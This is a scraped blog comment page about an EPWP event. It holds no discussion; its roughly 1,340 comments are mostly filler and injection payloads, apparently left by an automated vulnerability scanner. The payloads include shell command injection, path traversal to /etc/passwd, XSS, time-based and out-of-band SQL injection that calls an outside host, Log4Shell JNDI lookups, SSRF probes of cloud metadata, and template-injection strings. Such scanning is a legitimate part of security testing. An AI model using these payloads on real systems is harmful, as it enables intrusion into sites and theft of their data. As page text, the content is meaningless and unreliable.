EPWP Focus week Umgungundlovu Monday 20 February 2023

2,361 Responses

1. comment

2. comment

3. commentx7ih23as

4. x7iz6uvl'”x7iz6uvl

5. comment

6. comment

7. comment

8. comment

9. comment

10. ‘comment

11. comment’

12. comment”

13. comment$0

14. comment;/etc/passwd

15. comment|/bin/cat /etc/passwd

16. comment|/bin/cat /etc/passwd|

17. comment;/etc/hosts

18. comment|/bin/cat /etc/hosts

19. comment|/bin/cat /etc/hosts|

20. comment;/usr/bin/id

21. comment|/bin/cat /usr/bin/id

22. comment|/bin/cat /usr/bin/id|

23. type c:\boot.ini

24. comment&dir

25. comment&ipconfig

26. echo foobar x7kclrwd

27. comment&& echo foobar x7kygdzu

28. comment| echo foobar x7lifkt8

29. comment| echo foobar x7l1salp|

30. comment< echo foobar x7mlrhgo

31. netstat -na

32. comment&&netstat -na

33. comment|netstat -na

34. comment|netstat -na|

35. comment;netstat ;

36. comment<netstat -na

37. ping -h

38. comment&&ping -h

39. comment|ping -h

40. comment|ping -h|

41. comment<ping -h

42. $LANG

43. comment&&$LANG

44. comment|$LANG

45. ${applicationScope}

46. ${requestScope}

47. ${“asdflkj”.toString().replace(“d”,”x”)}

48. #{“asdflkj”.toString().replace(“d”,”x”)}

49. wp-comments-post.php

50. /etc/passwd

51. \WINDOWS\system32\drivers\etc\hosts

52. C:\WINDOWS\system32\drivers\etc\hosts

53. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts

54. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm

55. /wp-comments-post.php

56. ../../../../../../../../../../etc/hosts

57. < /etc/passwd

58. /.

59. \.

60. c:\.

61. http://appspidered.rapid7.com/

62. appspidered.rapid7.com/

63. wp-comments-post.php.

64. ../wp-comments-post.php.

65. ../../wp-comments-post.php.

66. c:\boot.ini.

67. c:\boot.ini

68. d:\boot.ini

69. ../../../../../../boot.ini.

70. ..\..\..\..\..\

71. comment%u0022

72. {‘comment

73. x7ae8zwi: x7ae8zwi

74. comment

75. comment

76. comment

77. comment

78. comment

79. comment

80. comment

81. comment

82. comment

83. comment

84. comment

85. comment

86. comment

87. comment

88. comment

89. comment

90. comment

91. comment

92. comment

93. comment

94. comment

95. comment

96. comment

97. comment

98. comment

99. comment

100. comment

101. comment

102. comment

103. comment

104. comment

105. comment

106. alert(358218)

107. “>alert(420115)

108. “>alert(547958)

109. ‘>alert(589220)

110. ‘>alert(663486)

111. comment%u0027

112. |

113. !comment

114. comment

115. comment’ OR 1=0 ##

116. comment

117. comment

118. comment

119. comment

120. comment

121. comment

122. comment

123. comment

124. comment

125. comment

126. comment

127. comment

128. comment

129. comment

130. comment

131. comment and 1 in (select BENCHMARK(1692307,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

132. comment

133. comment

134. comment

135. {{ 62951705 + 74179523 }}

136. comment’ and 1 in (select BENCHMARK(14825947,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

137. comment

138. comment

139. comment

140. comment

141. comment

142. comment

143. comment

144. comment

145. comment

146. comment

147. comment

148. comment

149. comment

150. comment

151. comment

152. comment

153. comment

154. comment

155. comment

156. comment

157. comment

158. comment

159. comment

160. comment

161. comment

162. comment

163. commentx77pducu

164. x777hlvt'”x777hlvt

165. comment

166. comment

167. comment

168. comment

169. comment

170. comment

171. comment

172. comment

173. comment

174. comment

175. comment

176. comment

177. comment

178. comment

179. comment

180. comment

181. comment

182. x7w6bdw9: x7w6bdw9

183. https://appspidered.rapid7.com/xss/script/4320becfba430588bf63220dc0b8fe4a0aec652f

184. comment

185. comment

186. comment

187. comment

188. comment

189. comment

190. comment

191. comment

192. comment

193. comment

194. comment

195. comment

196. comment

197. comment

198. comment

199. comment

200. comment

201. alert(1625233)

202. alert(1735890)

203. alert(1834250)

204. alert(1912135)

205. “>alert(2084310)

206. “>alert(2194976)

207. “>alert(2293342)

208. “>alert(2453183)

209. ‘>alert(2555660)

210. ‘>alert(2670418)

211. ‘>alert(2793356)

212. ‘>alert(2904001)

213. “>

214. “>

215. “>

216. “>

217. ‘>

218. ‘>

219. ‘>

220. ‘>

221. {constructor.constructor(4987940)}

222. {constructor.constructor(5193639)}

223. {constructor.constructor(5353966)}

224. {constructor.constructor(5534925)}

225. =alert(5711749)

226. =alert(5826945)

227. =alert(5946190)

228. =alert(6065420)

229. ‘alert(6184712)

230. ‘alert(6308115)

231. ‘alert(6427407)

232. ‘alert(6542567)

233. abc

234. abc

235. abc

236. abc

237. abc

238. abc

239. abc

240. abc

245. comment”>

246. comment”>

247. comment”>

248. comment”>

249. abc

250. abc

251. abc

252. abc

257. @import’x77toplb’;

258. @import’x78jwnze’;

259. @import’x7844tke’;

260. @import’x79wlpwn’;

261. ADw-script AD4-alert(10516716) ADw-/script AD4-

262. ADw-script AD4-alert(10664868) ADw-/script AD4-

263. +ADw-script+AD4-alert(10804718)+ADw-/script+AD4-

264. +ADw-script+AD4-alert(10952837)+ADw-/script+AD4-

265. abc

266. abc

267. abc

268. abc

273. comment’>

274. comment’>

275. comment’>

276. comment’>

277. http://appspidered.rapid7.com/

278. http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

279. commentʼ

280. comment| echo foobar x7l4qir9|

281. comment

282. comment’ OR ‘1’=’0

283. comment’) OR ‘1’ in (‘0

284. comment

285. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

286. comment

287. comment’ and 1 in (select*from(select(sleep(00)))a) —

288. comment’ and 1 in (select BENCHMARK(2222222,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

289. ‘ (select*from(select(sleep(05)))a) ‘

290. %u2019comment

291. %u2018comment

292. /../../../../../../../../../../..

293. ..\..\..\..\..\

294. ../wp-config.php

295. comment

296. comment

297. comment

298. comment

299. comment

300. comment

301. comment

302. comment

303. comment

304. comment

305. comment

306. comment

307. comment

308. comment

309. comment

310. comment

311. comment

312. comment

313. comment

314. comment

315. comment

316. comment

317. comment

318. comment

319. comment

320. comment

321. comment

322. comment

323. comment

324. comment

325. comment

326. comment

327. comment

328. comment

329. comment

330. comment

331. comment

332. comment

333. comment

334. comment

335. comment

336. comment

337. comment

338. comment

339. comment

340. comment

341. comment

342. comment

343. comment

344. comment

345. comment

346. comment

347. comment

348. comment

349. comment

350. comment

351. comment

352. comment

353. comment

354. comment

355. comment

356. comment

357. comment

358. comment

359. comment

360. comment

361. comment

362. comment

363. comment

364. comment

365. comment

366. comment

367. comment

368. comment

369. comment

370. comment

371. comment

372. comment

373. comment

374. comment

375. comment

376. comment

377. comment

378. comment

379. comment

380. comment

381. comment

382. comment

383. comment

384. comment

385. comment

386. comment

387. comment

388. comment

389. comment

390. comment

391. comment

392. comment

393. comment

394. comment

395. commentx7czjhkb

396. x7dgeaw7′”x7dgeaw7

397. comment

398. comment

399. comment

400. comment

401. comment

402. commentcommentcomment

403. 655321

404. ./*][

405. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

406. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

407. x7haa7al

408. x7hrshqt

409. x7h9v896: x7h9v896

410. http://appspidered.rapid7.com/xss/script/f497b6e4aa3f44ccd29c8ff68ba523cc76a42afd

411. http://appspidered.rapid7.com/xss/script/7f7b1f7a525de379e7f6012f3620f0c5d98c8c18

412. http://appspidered.rapid7.com/xss/script/43a357e1d8eb83872d0a16c2f33596d9f510e85e

413. http://appspidered.rapid7.com/xss/script/d95d5c0a51cd5c9a4e50295f0e4df4b5a7a2590d

414. https://appspidered.rapid7.com/xss/script/7f2592c2c4e0e6d499f994a2e6cf09e0da209aaf

415. https://appspidered.rapid7.com/xss/script/d174310e15ae24f9d662691f918a0fa8fe68aaef

416. https://appspidered.rapid7.com/xss/script/929d06305ef82cd41d517acf5582a1e3365ef1dd

417. https://appspidered.rapid7.com/xss/script/865b177178f871ed5a902081103bf90aad62d295

418. http://appspidered.rapid7.com/xss/script/cfd452267954cc926c38248aafa1c3e9095e752f

419. http://appspidered.rapid7.com/xss/script/7d28005a67bcca00f70f969fcd8a30edf6433024

420. http://appspidered.rapid7.com/xss/script/a4bb793f0893dea04dfcf75edec91ff49cb4c409

421. https://appspidered.rapid7.com/xss/script/e60766aef66e522b8c741b23b1cd016eb460acfa

422. https://appspidered.rapid7.com/xss/script/58b7cd1ff0f2141e26db2b16ca61d342359cd711

423. https://appspidered.rapid7.com/xss/script/cb143f7bd7e6e8c772dcc85c1b6a6b5d3ac1e3a8

424. https://appspidered.rapid7.com/xss/script/92b3bb1257861093690490eb470c296af2a31b2f

425. appspidered.rapid7.com/xss/script/a937371235fe9f14fc8656abfd22c1fe99bb82bd

426. appspidered.rapid7.com/xss/script/3cf96efadc0c9e3e9139c7e05bd8e3eb0cb42033

427. appspidered.rapid7.com/xss/script/f1f737bfd734ed3b3ac720363111a413bb3523cf

428. appspidered.rapid7.com/xss/script/d7998d4d552fa466aab0bb08b9423d9b864b00d2

429. {{ 58719 * 21973 }}

430. {{ 62951705 + 74179523 }}

431. *

432. |

433. comment|

434. &

435. comment&

436. comment)

437. !comment

438. ${jndi:ldap://b6674decbdab5eb5b9c05cb552b1fc9006192936.oob.appspidered.rapid7.${lower:COM}}

439. http://www.example.com/

440. https://example.com/

441. ftp://example.com/

442. http://example.com/

443. gopher://example.com/

444. example.com/

445. .example.com/

446. https://example.com/comment

447. wp-comments-post.php

448. /etc/passwd

449. \WINDOWS\system32\drivers\etc\hosts

450. C:\WINDOWS\system32\drivers\etc\hosts

451. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts

452. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm

453. /wp-comments-post.php

454. ../../../../../../../../../../etc/hosts

455. < /etc/passwd

456. /.

457. \.

458. c:\.

459. http://appspidered.rapid7.com/

460. appspidered.rapid7.com/

461. wp-comments-post.php.

462. ../wp-comments-post.php.

463. ../../wp-comments-post.php.

464. c:\boot.ini.

465. c:\boot.ini

466. ../../../../../../boot.ini.

467. ../../../../../../../../../../etc/hosts.

468. /..

469. \..

470. c:\..

471. /../../../../../../../../../../..

472. file:/etc/passwd

473. file:/wp-comments-post.php

474. /WEB-INF/web.xml

475. WEB-INF/web.xml

476. file:WEB-INF/web.xml

477. /../../WEB-INF/web.xml

478. \WEB-INF\web.xml

479. /../../../../../../../../../../.

480. noexistnoexist

481. http://localhost/

482. http://localhost:22/

483. package.json.bak

484. package.json.bak%00

485. ../wp-config.php

486. http://appspidered.rapid7.com/rfi/x7nypayg

487. /../../../../../../../../../../vendor.js

488. ../../../../../

489. ..\..\..\..\..\

491. ‘comment

492. comment’

493. comment”

494. comment%’

495. comment%u0027

496. comment%27

497. comment%”

498. comment%u0022

499. comment%22

500. LIMIT a

501. 1e309

502. char(0x27)char(0x27)comment

503. %u2018comment

504. %u2019comment

505. %u201acomment

506. %u201bcomment

507. %u201ccomment

508. %u201dcomment

509. %u201ecomment

510. — comment

511. /*comment

512. commentʼ

513. comment’ UNION ALL select NULL —

514. comment” UNION ALL select NULL —

515. SELECT * FROM “master”

516. SELECC * FROM “ds”

517. comment’ AND ‘1’=’0

518. comment’ AND ‘1’=’1

519. comment” AND “1”=”0

520. comment” AND “1”=”1

521. comment’ AND 1=0/*

522. comment’ AND 1=1/*

523. comment’ AND 1=0)/*

524. comment’ AND 1=1)/*

525. comment’ AND 1=0–

526. comment’ AND 1=1–

527. comment’ AND 1=0)–

528. comment’ AND 1=1)–

529. comment’) AND (‘1’=’0

530. comment’) AND (‘1’=’1

531. comment”) AND (“1″”=”0

532. comment”) AND (“1″”=”1

533. comment’ AND 1=0 LIMIT 1–

534. comment’ AND 1=1 LIMIT 1–

535. REPEAT(0x636f6d6d656e74,2)

536. REPEAT(0x636f6d6d656e74,1)

537. comment OR 1=1

538. comment OR 1=0

539. comment’ OR ‘1’=’1

540. comment’ OR ‘1’=’0

541. comment” OR “1”=”1

542. comment” OR “1”=”0

543. comment’) OR (‘1’=’1

544. comment’) OR (‘1’=’0

545. comment”) OR (“1″=”1

546. comment”) OR (“1″=”0

547. comment’ OR 1=1 ##

548. comment’ OR 1=0 ##

549. comment’ OR 1=1 —

550. comment’ OR 1=0 —

551. comment’) AND ‘1’ in (‘0

552. comment’) AND ‘1’ in (‘1

553. comment”) AND “1” in (“0

554. comment”) AND “1” in (“1

555. comment’) OR ‘1’ in (‘0

556. comment’) OR ‘1’ in (‘1

557. comment”) OR “1” in (“0

558. comment”) OR “1” in (“1

559. comment DESC

560. comment ASC

561. 1, comment DESC

562. 1, comment ASC

563. comment

564. comment

565. comment

566. comment

567. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

568. comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

569. comment and 1 in (select BENCHMARK(13358,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

570. comment and 1 in (select BENCHMARK(988,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

571. comment and 1 in (select BENCHMARK(70,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

572. comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

573. comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

574. comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

575. comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

576. comment’ and 1 in (select BENCHMARK(13097,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

577. comment’ and 1 in (select BENCHMARK(835,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

578. comment’ and 1 in (select BENCHMARK(53,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

579. comment’ and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

580. comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

581. comment’ and 1 in (select*from(select(sleep(00)))a) —

582. comment’ and 1 in (select*from(select(sleep(05)))a) —

583. ‘ (select*from(select(sleep(00)))a) ‘

584. ‘ (select*from(select(sleep(05)))a) ‘

585. comment’);WAITFOR DELAY ’00:00:00′–

586. comment’);WAITFOR DELAY ’00:00:05′–

587. comment AND pg_sleep(00) is not null

588. comment AND pg_sleep(05) is not null

589. comment ‘;select pg_sleep(00);– –

590. comment ‘;select pg_sleep(05);– –

591. comment ;select pg_sleep(00);– –

592. comment ;select pg_sleep(05);– –

593. comment’;+exec+master..xp_dirtree+”//19d977e07a64d280c33462ed865680cda65e0d51.oob.appspidered.rapid7.com/a”–

594. comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’35697e2274daa06bb475a0a3317c9e8e37728829.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–

595. comment’;+SELECT+LOAD_FILE(‘\\\\a4b00b4abcfed2518fc7293475b8f52bb07c303e.oob.appspidered.rapid7.com\\a’)#

596. comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\de61ae3951c2cbc56e8346d80ce29e5bfe6fc5b1.oob.appspidered.rapid7.com\\a’#

597. comment’;+copy+(SELECT+”)+to+program+’nslookup+fc35d685179d5fc1c6d6050ccf1900da8fdffbbd.oob.appspidered.rapid7.com’–

598. comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://48b74772a2105f10b127d46f1d0e375d915a5c04.oob.appspidered.rapid7.com/’)+END)–

599. comment” && sleep(00) && “1”!=”1

600. comment” && sleep(10000) && “1”!=”1

601. comment” && “1”==”0

602. comment” && “1”==”1

603. comment’ && ‘1’==’0

604. comment’ && ‘1’==’1

605. http://169.254.169.254/latest/meta-data/

606. http://169.254.169.254/latest/meta-data/ami-id

607. http://169.254.169.254/latest/meta-data/reservation-id

608. http://169.254.169.254/latest/meta-data/hostname

609. http://169.254.169.254/latest/meta-data/network/interfaces/macs/

610. http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

611. http://169.254.169.254/latest/dynamic/instance-identity/document

612. http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15

613. http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15

614. http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15

618. < /etc/passwd

619. a
     b

620. {comment

621. {‘comment

622. {“comment

623. comment{

624. comment’}

625. comment”}

626. comment}

627. comment/

628. comment/’

629. comment/”

630. /’comment

631. comment”}, {x7zij6lq:{$meta: “textScore

632. comment’}, {x7zz1g2u:{$meta: ‘textScore

633. comment”}}, {x70gwahm:{$meta: “textScore

634. comment’}, {x7014fh3:{$meta: ‘textScore

635. ‘.phpinfo().’

636. ${applicationScope}

637. ${requestScope}

638. ${“asdflkj”.toString().replace(“d”,”x”)}

639. #{“asdflkj”.toString().replace(“d”,”x”)}

640. comment$0

641. comment;/etc/passwd

642. comment|/bin/cat /etc/passwd

643. comment|/bin/cat /etc/passwd|

644. comment;/etc/hosts

645. comment|/bin/cat /etc/hosts

646. comment|/bin/cat /etc/hosts|

647. comment;/usr/bin/id

648. comment|/bin/cat /usr/bin/id

649. comment|/bin/cat /usr/bin/id|

650. type c:\boot.ini

651. comment&dir

652. comment&ipconfig

653. echo foobar x7cc5xan

654. comment&& echo foobar x7cwim0t

655. comment| echo foobar x7dmqkrn

656. comment| echo foobar x7d7ypq8|

657. comment< echo foobar x7eskdng

658. netstat -na

659. comment&&netstat -na

660. comment|netstat -na

661. comment|netstat -na|

662. comment;netstat ;

663. comment<netstat -na

664. ping -h

665. comment&&ping -h

666. comment|ping -h

667. comment|ping -h|

668. comment<ping -h

669. $LANG

670. comment&&$LANG

671. comment|$LANG

672. comment|$LANG|

673. comment<$LANG

674. ; free

675. ;ping localhost -c 21;

676. ;TIMEOUT /T 10 /NOBREAK;

677. alert(6088805)

678. alert(6215838)

679. alert(6351084)

680. alert(6490430)

681. “>alert(6826533)

682. “>alert(6974060)

683. “>alert(7113397)

684. “>alert(7244564)

685. ‘>alert(7412638)

686. ‘>alert(7556077)

687. ‘>alert(7687256)

688. ‘>alert(7826616)

689. “>

690. “>

691. “>

692. ‘>

693. ‘>

694. ‘>

695. {constructor.constructor(9052026)}

696. {constructor.constructor(9195448)}

697. {constructor.constructor(9355276)}

698. {constructor.constructor(9502806)}

699. comment

700. comment

701. comment

702. comment

703. comment

704. comment

705. comment

706. comment

707. comment

708. comment

709. comment

710. comment

711. comment

712. comment

713. comment

714. comment

715. comment

716. comment

717. comment

718. comment

719. comment

720. comment

721. comment

722. comment

723. comment

724. comment

725. comment

726. comment

727. comment

728. comment

729. comment

730. comment

731. comment

732. comment

733. comment

734. comment

735. comment

736. comment

737. comment

738. comment

739. comment

740. comment

741. comment

742. comment

743. comment

744. comment

745. comment

746. comment

747. comment

748. comment

749. comment

750. comment

751. comment

752. comment

753. comment

754. comment

755. comment

756. comment

757. comment

758. comment

759. comment

760. comment

761. comment

762. comment

763. comment

764. comment

765. comment

766. comment

767. comment

768. comment

769. comment

770. comment

771. comment

772. comment

773. comment

774. comment

775. comment

776. comment

777. comment

778. comment

779. comment

780. comment

781. comment

782. comment

783. comment

784. comment

785. comment

786. comment

787. comment

788. comment

789. comment

790. comment

791. comment

792. comment

793. comment

794. comment

795. comment

796. comment

797. comment

798. comment

799. comment

800. comment

801. comment

802. comment

803. comment

804. comment

805. comment

806. comment

807. comment

808. comment

809. comment

810. comment

811. comment

812. comment

813. comment

814. comment

815. comment

816. comment

817. comment

818. comment

819. comment

820. comment

821. comment

822. comment

823. comment

824. comment

825. comment

826. comment

827. comment

828. comment

829. comment

830. comment

831. comment

832. comment

833. comment

834. comment

835. comment

836. comment

837. comment

838. comment

839. comment

840. comment

841. comment

842. comment

843. comment

844. comment

845. comment

846. comment

847. comment

848. comment

849. comment

850. comment

851. comment

852. comment

853. comment

854. comment

855. comment

856. comment

857. comment

858. comment

859. comment

860. comment

861. comment

862. comment

863. comment

864. comment

865. comment

866. comment

867. comment

868. comment

869. comment

870. comment

871. comment

872. comment

873. comment

874. comment

875. comment

876. comment

877. comment

878. comment

879. comment

880. comment

881. comment

882. comment

883. comment

884. comment

885. comment

886. comment

887. comment

888. comment

889. comment

890. comment

891. comment

892. comment

893. comment

894. comment

895. comment

896. comment

897. comment

898. comment

899. comment

900. comment

901. comment

902. comment

903. comment

904. comment

905. comment

906. comment

907. comment

908. comment

909. comment

910. comment

911. comment

912. comment

913. comment

914. comment

915. comment

916. comment

917. comment

918. comment

919. comment

920. comment

921. comment

922. comment

923. comment

924. comment

925. comment

926. comment

927. comment

928. comment

929. comment

930. comment

931. comment

932. comment

933. comment

934. comment

935. comment

936. comment

937. comment

938. comment

939. comment

940. comment

941. comment

942. comment

943. comment

944. comment

945. comment

946. comment

947. comment

948. comment

949. comment

950. comment

951. comment

952. comment

953. comment

954. comment

955. comment

956. comment

957. comment

958. comment

959. comment

960. comment

961. comment

962. comment

963. comment

964. comment

965. comment

966. comment

967. comment

968. comment

969. comment

970. comment

971. comment

972. comment

973. comment

974. comment

975. comment

976. comment

977. comment

978. comment

979. comment

980. comment

981. comment

982. comment

983. comment

984. comment

985. comment

986. comment

987. comment

988. comment

989. comment

990. comment

991. comment

992. comment

993. comment

994. comment

995. comment

996. comment

997. comment

998. comment

999. comment

1000. comment

1001. comment

1002. comment

1003. comment

1004. comment

1005. comment

1006. comment

1007. comment

1008. comment

1009. comment

1010. comment

1011. comment

1012. comment

1013. comment

1014. comment

1015. comment

1016. comment

1017. comment

1018. comment

1019. comment

1020. comment

1021. comment

1022. comment

1023. comment

1024. comment

1025. comment

1026. comment

1027. comment

1028. comment

1029. comment

1030. comment

1031. comment

1032. comment

1033. comment

1034. comment

1035. comment

1036. comment

1037. comment

1038. comment

1039. comment

1040. comment

1041. comment

1042. comment

1043. comment

1044. comment

1045. comment

1046. comment

1047. comment

1048. comment

1049. comment

1050. comment

1051. comment

1052. comment

1053. comment

1054. comment

1055. comment

1056. comment

1057. comment

1058. comment

1059. comment

1060. comment

1061. comment

1062. comment

1063. comment

1064. comment

1065. comment

1066. comment

1067. comment

1068. comment

1069. comment

1070. comment

1071. comment

1072. comment

1073. comment

1074. comment

1075. comment

1076. comment

1077. comment

1078. comment

1079. comment

1080. comment

1081. comment

1082. comment

1083. comment

1084. comment

1085. comment

1086. comment

1087. comment

1088. comment

1089. comment

1090. comment

1091. comment

1092. comment

1093. comment

1094. comment

1095. comment

1096. comment

1097. comment

1098. comment

1099. comment

1100. comment

1101. comment

1102. comment

1103. comment

1104. comment

1105. comment

1106. comment

1107. comment

1108. comment

1109. comment

1110. comment

1111. comment

1112. comment

1113. comment

1114. comment

1115. comment

1116. comment

1117. comment

1118. comment

1119. comment

1120. comment

1121. comment

1122. comment

1123. comment

1124. comment

1125. comment

1126. comment

1127. comment

1128. comment

1129. comment

1130. comment

1131. comment

1132. comment

1133. comment

1134. comment

1135. comment

1136. comment

1137. comment

1138. comment

1139. comment

1140. comment

1141. comment

1142. comment

1143. comment

1144. comment

1145. comment

1146. comment

1147. comment

1148. comment

1149. comment

1150. comment

1151. comment

1152. comment

1153. comment

1154. comment

1155. comment

1156. comment

1157. x76y2u74

1158. comment

1159. comment

1160. comment

1161. comment

1162. comment

1163. comment

1164. comment

1165. comment

1166. comment

1167. comment

1168. comment

1169. comment

1170. comment

1171. comment

1172. comment

1173. comment

1174. comment

1175. comment

1176. comment

1177. comment|/bin/cat /etc/passwd|

1178. comment&& echo foobar x7s3dr1k

1179. comment

1180. comment

1181. comment

1182. comment

1183. comment

1184. alert(1520314)

1185. “>alert(1611393)

1186. “>alert(1689562)

1187. “>alert(1784660)

1188. ‘>alert(1887861)

1189. ‘>alert(1973978)

1190. ‘>alert(2051919)

1191. comment” && “1”==”0

1192. http://appspidered.rapid7.com/xss/script/2e9f6a1acd8bbfd813ca7d780b70c3ce9a55607d

1193. #{“asdflkj”.toString().replace(“d”,”x”)}

1194. comment” AND “1”=”0

1195. comment’ OR 1=0 ##

1196. comment

1197. comment

1198. comment

1199. comment

1200. comment

1201. comment

1202. comment

1203. comment

1204. comment

1205. comment

1206. comment

1207. comment

1208. comment

1209. ../../../../../../../../../../etc/hosts

1210. c:\..

1211. comment

1212. comment&

1213. comment

1214. comment

1215. comment

1216. comment

1217. comment

1218. comment

1219. comment

1220. comment

1221. comment

1222. comment

1223. comment

1224. comment

1225. comment

1226. comment

1227. comment

1228. comment

1229. comment

1230. comment

1231. comment

1232. comment

1233. comment

1234. comment

1235. comment

1236. comment

1237. comment

1238. comment

1239. comment

1240. comment

1241. comment

1242. comment

1243. comment

1244. comment

1245. comment

1246. comment

1247. comment

1248. comment

1249. comment

1250. comment

1251. comment

1252. comment

1253. comment

1254. comment

1255. comment

1256. commentx7qm6dtj

1257. x7rxzzfa'”x7rxzzfa

1258. comment

1259. comment

1260. comment

1261. comment

1262. comment

1263. comment

1264. comment

1265. comment

1266. comment

1267. comment

1268. comment

1269. comment

1270. comment

1271. comment

1272. comment

1273. comment

1274. comment

1275. comment

1276. comment

1277. comment

1278. comment

1279. comment

1280. comment

1281. comment

1282. ‘comment

1283. comment’

1284. comment”

1285. comment%’

1286. comment

1287. comment%u0027

1288. comment%27

1289. comment%”

1290. comment

1291. char(0x27)char(0x27)comment

1292. %u2018comment

1293. %u2019comment

1294. %u201acomment

1295. %u201bcomment

1296. /*comment

1297. commentʼ

1298. comment’ UNION ALL select NULL —

1299. comment” UNION ALL select NULL —

1300. SELECT * FROM “master”

1301. SELECC * FROM “ds”

1302. x7a4vwzc

1303. x7bzg59l

1304. x7cwkbwi: x7cwkbwi

1305. ‘.phpinfo().’

1306. ${jndi:ldap://a124967adfe2744030138cf2ddcea33b1a2bc163.oob.appspidered.rapid7.${lower:COM}}

1307. alert(7529865)

1308. alert(7718353)

1309. alert(7915026)

1310. alert(8148561)

1311. “>alert(8369803)

1312. “>alert(8578771)

1313. “>alert(8812325)

1314. “>alert(9000787)

1315. ‘>alert(9217939)

1316. ‘>alert(9447378)

1317. ‘>alert(9644038)

1318. ‘>alert(9852991)

1319. “>

1320. “>

1321. “>

1322. ‘>

1323. ‘>

1324. ‘>

1325. {constructor.constructor(11840259)}

1326. {constructor.constructor(12110665)}

1327. {constructor.constructor(12434374)}

1328. {constructor.constructor(12708914)}

1329. x72hefxr<x72hefxr

1330. x73cl6bo’x73cl6bo

1331. x74bkq8d”x74bkq8d

1332. x747eypk>x747eypk

1333. x76jhig5

1334. http://www.example.com/

1335. https://example.com/

1336. ftp://example.com/

1337. http://example.com/

1338. gopher://example.com/

1339. example.com/

1340. .example.com/

